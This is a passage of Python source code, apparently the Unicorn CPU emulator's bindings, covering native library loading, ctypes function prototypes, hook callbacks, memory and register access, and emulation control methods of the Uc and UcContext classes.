os.getenv('LIBUNICORN_PATH'), ] + canonicals + [ PurePath(inspect.getfile(__load_uc_lib)).parent / 'lib', '', r'/usr/local/lib' if sys.platform == 'darwin' else r'/usr/lib64', ] + [PurePath(p) / 'unicorn' / 'lib' for p in sys.path] # filter out None elements lib_locations = tuple(Path(loc) for loc in lib_locations if loc is not None) lib_name = { 'cygwin': 'cygunicorn.dll', 'darwin': 'libunicorn.2.dylib', 'linux': 'libunicorn.so.2', 'linux2': 'libunicorn.so.2', 'win32': 'unicorn.dll' }.get(platform, "libunicorn.so") def __attempt_load(libname: str): T = TypeVar('T') def __pick_first_valid(it: Iterable[T]) -> Optional[T]: """Iterate till encountering a non-None element and return it. """ return next((elem for elem in it if elem is not None), None) return __pick_first_valid(_load_lib(loc, libname) for loc in lib_locations) lib = __attempt_load(lib_name) or __attempt_load('libunicorn.so') if lib is None: raise ImportError('Failed to load the Unicorn dynamic library') return lib def __set_lib_prototypes(lib: ctypes.CDLL) -> None: """Set up library functions prototypes. Args: lib: unicorn library instance """ def __set_prototype(fname: str, restype: Type[ctypes._CData], *argtypes: Type[ctypes._CData]) -> None: func: Optional[ctypes._FuncPointer] = getattr(lib, fname, None) if func is None: raise ImportError('Failed to setup function prototypes; make sure you have cleaned your unicorn1 installation') func.restype = restype func.argtypes = argtypes __set_prototype('uc_version', ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int)) __set_prototype('uc_arch_supported', ctypes.c_bool, ctypes.c_int) __set_prototype('uc_open', uc_err, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine)) __set_prototype('uc_close', uc_err, uc_engine) __set_prototype('uc_strerror', ctypes.c_char_p, uc_err) __set_prototype('uc_errno', uc_err, uc_engine) __set_prototype('uc_reg_read', uc_err, uc_engine, ctypes.c_int, ctypes.c_void_p) __set_prototype('uc_reg_write', uc_err, uc_engine, ctypes.c_int, ctypes.c_void_p) __set_prototype('uc_reg_read_batch', uc_err, uc_engine, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_void_p), ctypes.c_int) __set_prototype('uc_mem_read', uc_err, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) __set_prototype('uc_mem_write', uc_err, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) __set_prototype('uc_emu_start', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t) __set_prototype('uc_emu_stop', uc_err, uc_engine) __set_prototype('uc_hook_del', uc_err, uc_engine, uc_hook_h) __set_prototype('uc_mmio_map', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p) __set_prototype('uc_mem_map', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) __set_prototype('uc_mem_map_ptr', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p) __set_prototype('uc_mem_unmap', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t) __set_prototype('uc_mem_protect', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) __set_prototype('uc_query', uc_err, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t)) __set_prototype('uc_context_alloc', uc_err, uc_engine, ctypes.POINTER(uc_context)) __set_prototype('uc_free', uc_err, ctypes.c_void_p) __set_prototype('uc_context_save', uc_err, uc_engine, uc_context) __set_prototype('uc_context_restore', uc_err, uc_engine, uc_context) __set_prototype('uc_context_size', ctypes.c_size_t, uc_engine) __set_prototype('uc_context_reg_read', uc_err, uc_context, ctypes.c_int, ctypes.c_void_p) __set_prototype('uc_context_reg_write', uc_err, uc_context, ctypes.c_int, ctypes.c_void_p) __set_prototype('uc_context_reg_read_batch', uc_err, uc_context, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_void_p), ctypes.c_int) __set_prototype('uc_context_free', uc_err, uc_context) __set_prototype('uc_mem_regions', uc_err, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32)) # https://bugs.python.org/issue42880 __set_prototype('uc_hook_add', uc_err, uc_engine, ctypes.POINTER(uc_hook_h), ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint64, ctypes.c_uint64) __set_prototype('uc_ctl', uc_err, uc_engine, ctypes.c_int) uclib = __load_uc_lib() __set_lib_prototypes(uclib) # native hook callback signatures HOOK_INTR_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_void_p) HOOK_CODE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_void_p) HOOK_MEM_INVALID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p) HOOK_MEM_ACCESS_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p) HOOK_INSN_INVALID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p) HOOK_EDGE_GEN_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.POINTER(uc_tb), ctypes.POINTER(uc_tb), ctypes.c_void_p) HOOK_TCG_OPCODE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_void_p) # mmio callback signatures MMIO_READ_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint64, uc_engine, ctypes.c_uint64, ctypes.c_uint, ctypes.c_void_p) MMIO_WRITE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint, ctypes.c_uint64, ctypes.c_void_p) class UcError(Exception): """Unicorn base exception. Error context is specified through `errno` and `args`. """ def __init__(self, errno: int, *args): super().__init__(*args) self.errno = errno def __str__(self) -> str: return uclib.uc_strerror(self.errno).decode('ascii') def uc_version() -> Tuple[int, int, int]: """Retrieve Unicorn library version. Returns: a tuple containing major, minor and a combined verion number """ major = ctypes.c_int() minor = ctypes.c_int() combined = uclib.uc_version( ctypes.byref(major), ctypes.byref(minor) ) return (major.value, minor.value, combined) def version_bind() -> Tuple[int, int, int]: """Retrieve Unicorn bindings version. Returns: a tuple containing major, minor and a combined verion number """ major = uc.UC_API_MAJOR minor = uc.UC_API_MINOR combined = (major << 8) + minor return (major, minor, combined) def uc_arch_supported(atype: int) -> bool: """Check whether Unicorn library supports a particular arch. """ return bool(uclib.uc_arch_supported(atype)) def debug() -> str: """Get verbose verion string. """ archs = ( ('arm', uc.UC_ARCH_ARM), ('arm64', uc.UC_ARCH_ARM64), ('mips', uc.UC_ARCH_MIPS), ('x86', uc.UC_ARCH_X86), ('ppc', uc.UC_ARCH_PPC), ('sparc', uc.UC_ARCH_SPARC), ('m68k', uc.UC_ARCH_M68K), ('riscv', uc.UC_ARCH_RISCV), ('s390x', uc.UC_ARCH_S390X), ('tricore', uc.UC_ARCH_TRICORE) ) all_archs = ''.join(f'-{name}' for name, atype in archs if uc_arch_supported(atype)) lib_maj, lib_min, _ = uc_version() bnd_maj, bnd_min, _ = version_bind() return f'python-{all_archs}-c{lib_maj}.{lib_min}-b{bnd_maj}.{bnd_min}' if TYPE_CHECKING: # _FuncPointer is not recognized at runtime; use it only for type annotation _CFP = TypeVar('_CFP', bound=ctypes._FuncPointer) def uccallback(uc: Uc, functype: Type[_CFP]): """Unicorn callback decorator. Wraps a Python function meant to be dispatched by Unicorn as a hook callback. The function call is wrapped with an exception guard to catch and record exceptions thrown during hook handling. If an exception occurs, it is saved to the Uc object and emulation is stopped. """ def decorate(func) -> _CFP: @functools.wraps(func) def wrapper(handle: Uc, *args, **kwargs): try: return func(uc, *args, **kwargs) except Exception as e: # If multiple hooks raise exceptions, just use the first one if uc._hook_exception is None: uc._hook_exception = e uc.emu_stop() return ctypes.cast(functype(wrapper), functype) return decorate class RegStateManager: """Registers state manager. Designed as a mixin class; not to be instantiated directly. Some methods must be implemented by mixin instances """ _DEFAULT_REGTYPE = ctypes.c_uint64 def _do_reg_read(self, reg_id: int, reg_obj) -> int: """Private register read implementation. Must be implemented by the mixin object """ raise NotImplementedError def _do_reg_write(self, reg_id: int, reg_obj) -> int: """Private register write implementation. Must be implemented by the mixin object """ raise NotImplementedError def _do_reg_read_batch(self, reglist, vallist, count) -> int: """Private batch register read implementation. Must be implemented by the mixin object """ raise NotImplementedError def _do_reg_write_batch(self, reglist, count) -> int: """Private batch register write implementation. Must be implemented by the mixin object """ raise NotImplementedError @staticmethod def __get_reg_read_arg(regtype: Type, *args): return regtype(*args) @staticmethod def __get_reg_write_arg(regtype: Type, value): return regtype.from_value(value) if issubclass(regtype, UcReg) else regtype(value) def _reg_read(self, reg_id: int, regtype: Type, *args): """Register read helper method. """ reg = self.__get_reg_read_arg(regtype, *args) status = self._do_reg_read(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status, reg_id) return reg.value def _reg_write(self, reg_id: int, regtype: Type, value) -> None: """Register write helper method. """ reg = self.__get_reg_write_arg(regtype, value) status = self._do_reg_write(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status, reg_id) def _reg_read_batch(self, reg_ids: Sequence[int], reg_types: Sequence[Type]) -> Tuple: """Batch register read helper method. """ assert len(reg_ids) == len(reg_types) count = len(reg_ids) reg_list = (ctypes.c_int * count)(*reg_ids) val_list = [rtype() for rtype in reg_types] ptr_list = (ctypes.c_void_p * count)(*(ctypes.c_void_p(ctypes.addressof(elem)) for elem in val_list)) status = self._do_reg_read_batch(reg_list, ptr_list, ctypes.c_int(count)) if status != uc.UC_ERR_OK: raise UcError(status) return tuple(v.value for v in val_list) def reg_read(self, reg_id: int, aux: Any = None): """Read architectural register value. Args: reg_id : register identifier (architecture-specific enumeration) aux : auxiliary data (register specific) Returns: register value (register-specific format) Raises: `UcError` in case of invalid register id or auxiliary data """ return self._reg_read(reg_id, self._DEFAULT_REGTYPE) def reg_write(self, reg_id: int, value) -> None: """Write to architectural register. Args: reg_id : register identifier (architecture-specific enumeration) value : value to write (register-specific format) Raises: `UcError` in case of invalid register id or value format """ self._reg_write(reg_id, self._DEFAULT_REGTYPE, value) def reg_read_batch(self, reg_ids: Sequence[int]) -> Tuple: """Read a sequence of architectural registers. Args: reg_ids: a sequence of register identifiers (architecture-specific enumeration) Returns: a tuple of registers values (register-specific format) Raises: `UcError` in case of invalid register id """ reg_types = [self._DEFAULT_REGTYPE for _ in range(len(reg_ids))] return self._reg_read_batch(reg_ids, reg_types) def reg_write_batch(self, reg_info: Sequence[Tuple[int, Any]]) -> None: """Write a sequece of architectural registers. Args: regs_info: a sequence of tuples consisting of register identifiers and values Raises: `UcError` in case of invalid register id or value format """ # TODO ... def ucsubclass(cls): """Uc subclass decorator. Use it to decorate user-defined Uc subclasses. Example: >>> @ucsubclass ... class Pegasus(Uc): ... '''A Unicorn impl with wings ... ''' ... pass """ # to maintain proper inheritance for user-defined Uc subclasses, the Uc # base class is replaced with the appropriate Uc pre-defined subclass on # first instantiation. # # for example, if the Pegasus class from the example above instantiates # with Intel arch and 64-bit mode, the Pegasus class will be modified to # inherit from UcIntel and only then Uc, instead of Uc directly. that is: # Pegasus -> UcIntel -> Uc -> RegStateManager -> object # # note that all Pegasus subclasses will have the same inheritence chain, # regardless of the arch and mode the might use to initialize. def __replace(seq: Tuple, item, repl) -> Tuple: if item not in seq: return seq i = seq.index(item) return seq[:i] + tuple([repl]) + seq[i + 1:] def __new_uc_subclass(cls, arch: int, mode: int): # resolve the appropriate Uc subclass subcls = Uc.__new__(cls, arch, mode) # set the resolved subclass as base class instead of Uc (if there) cls.__bases__ = __replace(cls.__bases__, Uc, type(subcls)) return object.__new__(cls) setattr(cls, '__new__', __new_uc_subclass) return cls class Uc(RegStateManager): """Unicorn Engine class. """ @staticmethod def __is_compliant() -> bool: """Checks whether Unicorn binding version complies with Unicorn library. Returns: `True` if versions match, `False` otherwise """ uc_maj, uc_min, _ = uc_version() bnd_maj, bnd_min, _ = version_bind() return (uc_maj, uc_min) == (bnd_maj, bnd_min) def __new__(cls, arch: int, mode: int, cpu: Optional[int] = None): # verify version compatibility with the core before doing anything if not Uc.__is_compliant(): raise UcError(uc.UC_ERR_VERSION) import importlib def __uc_subclass(pkgname: str, clsname: str): """Use a lazy subclass instantiation to avoid importing unnecessary arch classes. """ def __wrapped() -> Type[Uc]: archmod = importlib.import_module(f'.arch.{pkgname}', 'unicorn.unicorn_py3') return getattr(archmod, clsname) return __wrapped def __uc_generic(): return Uc wrapped: Callable[[], Type[Uc]] = { uc.UC_ARCH_ARM : __uc_subclass('arm', 'UcAArch32'), uc.UC_ARCH_ARM64 : __uc_subclass('arm64', 'UcAArch64'), uc.UC_ARCH_MIPS : __uc_generic, uc.UC_ARCH_X86 : __uc_subclass('intel', 'UcIntel'), uc.UC_ARCH_PPC : __uc_generic, uc.UC_ARCH_SPARC : __uc_generic, uc.UC_ARCH_M68K : __uc_generic, uc.UC_ARCH_RISCV : __uc_generic, uc.UC_ARCH_S390X : __uc_generic, uc.UC_ARCH_TRICORE : __uc_generic }[arch] subclass = wrapped() # return the appropriate unicorn subclass type return super(Uc, cls).__new__(subclass) def __init__(self, arch: int, mode: int, cpu: Optional[int] = None) -> None: """Initialize a Unicorn engine instance. Args: arch: emulated architecture identifier (see UC_ARCH_* constants) mode: emulated processor mode (see UC_MODE_* constants) cpu: emulated cpu model (see UC_CPU_* constants) [optional] """ self._arch = arch self._mode = mode # initialize the unicorn instance self._uch = uc_engine() status = uclib.uc_open(arch, mode, ctypes.byref(self._uch)) if status != uc.UC_ERR_OK: self._uch = None raise UcError(status) if cpu is not None: self.ctl_set_cpu_model(cpu) # we have to keep a reference to the callbacks so they do not get gc-ed # see: https://docs.python.org/3/library/ctypes.html#callback-functions self._callbacks: MutableMapping[int, ctypes._FuncPointer] = {} self._mmio_callbacks: MutableMapping[Tuple[int, int], Tuple[Optional[MMIO_READ_CFUNC], Optional[MMIO_WRITE_CFUNC]]] = {} self._hook_exception: Optional[Exception] = None # create a finalizer object that will apropriately free up resources when # this instance undergoes garbage collection. self.__finalizer = weakref.finalize(self, Uc.release_handle, self._uch) @staticmethod def release_handle(uch: uc_engine) -> None: # this method and its arguments must not have any reference to the Uc instance being # destroyed. namely, this method cannot be a bound method. if uch: try: status = uclib.uc_close(uch) # _uc might be pulled from under our feet except: pass else: if status != uc.UC_ERR_OK: raise UcError(status) ########################### # Emulation controllers # ########################### def emu_start(self, begin: int, until: int, timeout: int = 0, count: int = 0) -> None: """Start emulation from a specified address to another. Args: begin : emulation starting address until : emulation ending address timeout : limit emulation to a certain amount of time (milliseconds) count : limit emulation to a certain amount of instructions Raises: `UcError` : in case emulation could not be started properly `Exception` : in case an error has been encountered during emulation """ self._hook_exception = None status = uclib.uc_emu_start(self._uch, begin, until, timeout, count) if status != uc.UC_ERR_OK: raise UcError(status) if self._hook_exception is not None: raise self._hook_exception def emu_stop(self) -> None: """Stop emulation. Raises: `UcError` in case emulation could not be stopped properly """ status = uclib.uc_emu_stop(self._uch) if status != uc.UC_ERR_OK: raise UcError(status) ########################### # CPU state accessors # ########################### def _do_reg_read(self, reg_id: int, reg_obj) -> int: """Private register read implementation. Do not call directly. """ return uclib.uc_reg_read(self._uch, reg_id, reg_obj) def _do_reg_write(self, reg_id: int, reg_obj) -> int: """Private register write implementation. Do not call directly. """ return uclib.uc_reg_write(self._uch, reg_id, reg_obj) def _do_reg_read_batch(self, reglist, vallist, count) -> int: """Private batch register read implementation. Do not call directly. """ return uclib.uc_reg_read_batch(self._uch, reglist, vallist, count) ########################### # Memory management # ########################### def mem_map(self, address: int, size: int, perms: int = uc.UC_PROT_ALL) -> None: """Map a memory range. Args: address : range base address size : range size (in bytes) perms : access protection bitmask Raises: `UcError` in case memory could not be mapped """ assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask' status = uclib.uc_mem_map(self._uch, address, size, perms) if status != uc.UC_ERR_OK: raise UcError(status) def mem_map_ptr(self, address: int, size: int, perms: int, ptr: int) -> None: """Map a memory range and point to existing data on host memory. Args: address : range base address size : range size (in bytes) perms : access protection bitmask ptr : address of data on host memory Raises: `UcError` in case memory could not be mapped """ assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask' status = uclib.uc_mem_map_ptr(self._uch, address, size, perms, ptr) if status != uc.UC_ERR_OK: raise UcError(status) def mem_unmap(self, address: int, size: int) -> None: """Reclaim a mapped memory range. Args: address : range base address size : range size (in bytes) Raises: `UcError` in case memory could not be unmapped """ status = uclib.uc_mem_unmap(self._uch, address, size) if status != uc.UC_ERR_OK: raise UcError(status) # TODO: this is where mmio callbacks need to be released from cache, # but we cannot tell whether this is an mmio range. also, memory ranges # might be splitted by 'map_protect' after they were mapped, so the # (start, end) tuple may not be suitable for retrieving the callbacks. # # here we try to do that on a best-effort basis: rng = (address, address + size) if rng in self._mmio_callbacks: del self._mmio_callbacks[rng] def mem_protect(self, address: int, size: int, perms: int = uc.UC_PROT_ALL) -> None: """Modify access protection bitmask of a mapped memory range. Args: address : range base address size : range size (in bytes) perms : new access protection bitmask Raises: `UcError` in case access protection bitmask could not be changed """ assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask' status = uclib.uc_mem_protect(self._uch, address, size, perms) if status != uc.UC_ERR_OK: raise UcError(status) def mmio_map(self, address: int, size: int, read_cb: Optional[UC_MMIO_READ_TYPE], user_data_read: Any, write_cb: Optional[UC_MMIO_WRITE_TYPE], user_data_write: Any) -> None: @uccallback(self, MMIO_READ_CFUNC) def __mmio_map_read_cb(uc: Uc, offset: int, size: int, key: int) -> int: assert read_cb is not None return read_cb(uc, offset, size, user_data_read) @uccallback(self, MMIO_WRITE_CFUNC) def __mmio_map_write_cb(uc: Uc, offset: int, size: int, value: int, key: int) -> None: assert write_cb is not None write_cb(uc, offset, size, value, user_data_write) read_cb_fptr = read_cb and __mmio_map_read_cb write_cb_fptr = write_cb and __mmio_map_write_cb status = uclib.uc_mmio_map(self._uch, address, size, read_cb_fptr, 0, write_cb_fptr, 0) if status != uc.UC_ERR_OK: raise UcError(status) # hold a reference to mmio callbacks rng = (address, address + size) self._mmio_callbacks[rng] = (read_cb_fptr, write_cb_fptr) def mem_regions(self) -> Iterator[Tuple[int, int, int]]: """Iterate through mapped memory regions. Returns: an iterator whose elements contain begin, end and perms properties of each range Raises: `UcError` in case an itnernal error has been encountered """ regions = ctypes.POINTER(_uc_mem_region)() count = ctypes.c_uint32() status = uclib.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count)) if status != uc.UC_ERR_OK: raise UcError(status) try: for i in range(count.value): yield regions[i].value finally: uclib.uc_free(regions) def mem_read(self, address: int, size: int) -> bytearray: """Read data from emulated memory subsystem. Args: address : source memory location size : amount of bytes to read Returns: data bytes Raises: `UcError` in case of an invalid memory access """ data = ctypes.create_string_buffer(size) status = uclib.uc_mem_read(self._uch, address, data, size) if status != uc.UC_ERR_OK: raise UcError(status, address, size) return bytearray(data) def mem_write(self, address: int, data: bytes) -> None: """Write data to emulated memory subsystem. Args: address : target memory location data : data bytes to write Raises: `UcError` in case of an invalid memory access """ size = len(data) status = uclib.uc_mem_write(self._uch, address, data, size) if status != uc.UC_ERR_OK: raise UcError(status, address, size) ########################### # Event hooks management # ########################### def __do_hook_add(self, htype: int, fptr: ctypes._FuncPointer, begin: int, end: int, *args: ctypes.c_int) -> int: handle = uc_hook_h() # TODO: we do not need a callback counter to reference the callback and user data anymore, # so just pass a dummy value. that value will become the unused 'key' argument dummy = 0 status = uclib.uc_hook_add( self._uch, ctypes.byref(handle), htype, fptr, ctypes.cast(dummy, ctypes.c_void_p), ctypes.c_uint64(begin), ctypes.c_uint64(end), *args ) if status != uc.UC_ERR_OK: raise UcError(status) # hold a reference to the funcion pointer to prevent it from being gc-ed self._callbacks[handle.value] = fptr return handle.value def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int: """Hook emulated events of a certain type. Args: htype : event type(s) to hook (see UC_HOOK_* constants) callback : a method to call each time the hooked event occurs user_data : an additional context to pass to the callback when it is called begin : address where hook scope starts end : address where hook scope ends aux1 : auxiliary parameter; needed for some hook types aux2 : auxiliary parameter; needed for some hook types Returns: hook handle Raises: `UcError` in case of an invalid htype value """ def __hook_intr(): @uccallback(self, HOOK_INTR_CFUNC) def __hook_intr_cb(uc: Uc, intno: int, key: int): callback(uc, intno, user_data) return __hook_intr_cb, def __hook_insn(): # each arch is expected to overload hook_add and implement this handler on their own. # if we got here, it means this particular architecture does not support hooking any # instruction and so we fail raise UcError(uc.UC_ERR_ARG) def __hook_code(): @uccallback(self, HOOK_CODE_CFUNC) def __hook_code_cb(uc: Uc, address: int, size: int, key: int): callback(uc, address, size, user_data) return __hook_code_cb, def __hook_invalid_mem(): @uccallback(self, HOOK_MEM_INVALID_CFUNC) def __hook_mem_invalid_cb(uc: Uc, access: int, address: int, size: int, value: int, key: int) -> bool: return callback(uc, access, address, size, value, user_data) return __hook_mem_invalid_cb, def __hook_mem(): @uccallback(self, HOOK_MEM_ACCESS_CFUNC) def __hook_mem_access_cb(uc: Uc, access: int, address: int, size: int, value: int, key: int) -> None: callback(uc, access, address, size, value, user_data) return __hook_mem_access_cb, def __hook_invalid_insn(): @uccallback(self, HOOK_INSN_INVALID_CFUNC) def __hook_insn_invalid_cb(uc: Uc, key: int) -> bool: return callback(uc, user_data) return __hook_insn_invalid_cb, def __hook_edge_gen(): @uccallback(self, HOOK_EDGE_GEN_CFUNC) def __hook_edge_gen_cb(uc: Uc, cur: ctypes._Pointer[uc_tb], prev: ctypes._Pointer[uc_tb], key: int): callback(uc, cur.contents, prev.contents, user_data) return __hook_edge_gen_cb, def __hook_tcg_opcode(): @uccallback(self, HOOK_TCG_OPCODE_CFUNC) def __hook_tcg_op_cb(uc: Uc, address: int, arg1: int, arg2: int, size: int, key: int): callback(uc, address, arg1, arg2, size, user_data) opcode = ctypes.c_uint64(aux1) flags = ctypes.c_uint64(aux2) return __hook_tcg_op_cb, opcode, flags handlers: Mapping[int, Callable[[], Tuple]] = { uc.UC_HOOK_INTR : __hook_intr, uc.UC_HOOK_INSN : __hook_insn, uc.UC_HOOK_CODE : __hook_code, uc.UC_HOOK_BLOCK : __hook_code, uc.UC_HOOK_MEM_READ_UNMAPPED : __hook_invalid_mem, uc.UC_HOOK_MEM_WRITE_UNMAPPED : __hook_invalid_mem, uc.UC_HOOK_MEM_FETCH_UNMAPPED : __hook_invalid_mem, uc.UC_HOOK_MEM_READ_PROT : __hook_invalid_mem, uc.UC_HOOK_MEM_WRITE_PROT : __hook_invalid_mem, uc.UC_HOOK_MEM_FETCH_PROT : __hook_invalid_mem, uc.UC_HOOK_MEM_READ : __hook_mem, uc.UC_HOOK_MEM_WRITE : __hook_mem, uc.UC_HOOK_MEM_FETCH : __hook_mem, # uc.UC_HOOK_MEM_READ_AFTER uc.UC_HOOK_INSN_INVALID : __hook_invalid_insn, uc.UC_HOOK_EDGE_GENERATED : __hook_edge_gen, uc.UC_HOOK_TCG_OPCODE : __hook_tcg_opcode } # the same callback may be registered for multiple hook types if they # share the same handling method. here we iterate through htype set bits # and collect all unique handlers it refers to (no duplicates) matched = set(handlers.get(1 << n) for n in range(32) if htype & (1 << n)) # the set of matched handlers is expected to include exactly one element. # more than one member indicates that htype refers to more than one handler # at the same time, whereas callbacks cannot be assigned to different handlers. # an empty set indicates a matching handler was not found, probably due to # an invalid htype value if len(matched) != 1: raise UcError(uc.UC_ERR_ARG) handler = matched.pop() # a None element indicates that htype has an unrecognized bit set if handler is None: raise UcError(uc.UC_ERR_ARG) fptr, *aux = handler() return self.__do_hook_add(htype, fptr, begin, end, *aux) def hook_del(self, handle: int) -> None: """Remove an existing hook. Args: handle: hook handle """ h = uc_hook_h(handle) status = uclib.uc_hook_del(self._uch, h) if status != uc.UC_ERR_OK: raise UcError(status) del self._callbacks[handle] def query(self, prop: int) -> int: """Query an internal Unicorn property. Args: prop: property identifier (see: UC_QUERY_* constants) Returns: property value """ result = ctypes.c_size_t() status = uclib.uc_query(self._uch, prop, ctypes.byref(result)) if status != uc.UC_ERR_OK: raise UcError(status, prop) return result.value def context_save(self) -> UcContext: context = UcContext(self._uch, self._arch, self._mode) status = uclib.uc_context_save(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) return context def context_update(self, context: UcContext) -> None: status = uclib.uc_context_save(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) def context_restore(self, context: UcContext) -> None: status = uclib.uc_context_restore(self._uch, context.context) if status != uc.UC_ERR_OK: raise UcError(status) @staticmethod def __ctl_encode(ctl: int, op: int, nargs: int) -> int: assert nargs and (nargs & ~0b1111) == 0, f'nargs must not exceed value of 15 (got {nargs})' assert op and (op & ~0b11) == 0, f'op must not exceed value of 3 (got {op})' return (op << 30) | (nargs << 26) | ctl def ctl(self, ctl: int, op: int, *args): code = Uc.__ctl_encode(ctl, op, len(args)) status = uclib.uc_ctl(self._uch, code, *args) if status != uc.UC_ERR_OK: raise UcError(status) Arg = Tuple[Type, Optional[int]] def __ctl_r(self, ctl: int, arg0: Arg): atype, _ = arg0 carg = atype() self.ctl(ctl, uc.UC_CTL_IO_READ, ctypes.byref(carg)) return carg.value def __ctl_w(self, ctl: int, *args: Arg): cargs = (atype(avalue) for atype, avalue in args) self.ctl(ctl, uc.UC_CTL_IO_WRITE, *cargs) def __ctl_wr(self, ctl: int, arg0: Arg, arg1: Arg): atype, avalue = arg0 carg0 = atype(avalue) atype, _ = arg1 carg1 = atype() self.ctl(ctl, uc.UC_CTL_IO_READ_WRITE, carg0, ctypes.byref(carg1)) return carg1 def ctl_get_mode(self) -> int: return self.__ctl_r(uc.UC_CTL_UC_MODE, (ctypes.c_int, None) ) def ctl_get_page_size(self) -> int: return self.__ctl_r(uc.UC_CTL_UC_PAGE_SIZE, (ctypes.c_uint32, None) ) def ctl_set_page_size(self, val: int) -> None: self.__ctl_w(uc.UC_CTL_UC_PAGE_SIZE, (ctypes.c_uint32, val) ) def ctl_get_arch(self) -> int: return self.__ctl_r(uc.UC_CTL_UC_ARCH, (ctypes.c_int, None) ) def ctl_get_timeout(self) -> int: return self.__ctl_r(uc.UC_CTL_UC_TIMEOUT, (ctypes.c_uint64, None) ) def ctl_exits_enabled(self, val: bool) -> None: self.__ctl_w(uc.UC_CTL_UC_USE_EXITS, (ctypes.c_int, val) ) def ctl_get_exits_cnt(self) -> int: return self.__ctl_r(uc.UC_CTL_UC_EXITS_CNT, (ctypes.c_size_t, None) ) def ctl_get_exits(self) -> Sequence[int]: count = self.ctl_get_exits_cnt() arr = (ctypes.c_uint64 * count)() self.ctl(uc.UC_CTL_UC_EXITS, uc.UC_CTL_IO_READ, ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(count)) return tuple(i for i in arr) def ctl_set_exits(self, exits: Sequence[int]) -> None: arr = (ctypes.c_uint64 * len(exits))() for idx, exit in enumerate(exits): arr[idx] = exit self.ctl(uc.UC_CTL_UC_EXITS, uc.UC_CTL_IO_WRITE, ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(len(exits))) def ctl_get_cpu_model(self) -> int: return self.__ctl_r(uc.UC_CTL_CPU_MODEL, (ctypes.c_int, None) ) def ctl_set_cpu_model(self, val: int) -> None: self.__ctl_w(uc.UC_CTL_CPU_MODEL, (ctypes.c_int, val) ) def ctl_remove_cache(self, addr: int, end: int) -> None: self.__ctl_w(uc.UC_CTL_TB_REMOVE_CACHE, (ctypes.c_uint64, addr), (ctypes.c_uint64, end) ) def ctl_request_cache(self, addr: int): return self.__ctl_wr(uc.UC_CTL_TB_REQUEST_CACHE, (ctypes.c_uint64, addr), (uc_tb, None) ) def ctl_flush_tb(self) -> None: self.__ctl_w(uc.UC_CTL_TB_FLUSH) def ctl_tlb_mode(self, mode: int) -> None: self.__ctl_w(uc.UC_CTL_TLB_TYPE, (ctypes.c_uint, mode) ) class UcContext(RegStateManager): def __init__(self, h, arch: int, mode: int): self._context = uc_context() self._size = uclib.uc_context_size(h) status = uclib.uc_context_alloc(h, ctypes.byref(self._context)) if status != uc.UC_ERR_OK: raise UcError(status) self._to_free = True self._arch = arch self._mode = mode @property def context(self): return self._context @property def size(self) -> int: return self._size @property def arch(self) -> int: return self._arch @property def mode(self) -> int: return self._mode # RegStateManager mixin method implementation def _do_reg_read(self, reg_id: int, reg_obj) -> int: """Private register read implementation. """ return uclib.uc_context_reg_read(self._context, reg_id, reg_obj) # RegStateManager mixin method implementation def _do_reg_write(self, reg_id: int, reg_obj) -> int: """Private register write implementation. """ return uclib.uc_context_reg_write(self._context, reg_id, reg_obj) def _do_reg_read_batch(self, reglist, vallist, count) -> int: """Private batch register read implementation. """ return uclib.uc_context_reg_read_batch(self._context, reglist, vallist, count) # Make UcContext picklable def __getstate__(self): return bytes(self), self.size, self.arch, self.mode def __setstate__(self, state) -> None: context, size, arch, mode = state self._context = ctypes.cast(ctypes.create_string_buffer(context, size), uc_context) self._size = size self._arch = arch self._mode = mode # __init__ won't be invoked, so we are safe to set it here. self._to_free = False def __bytes__(self) -> bytes: return 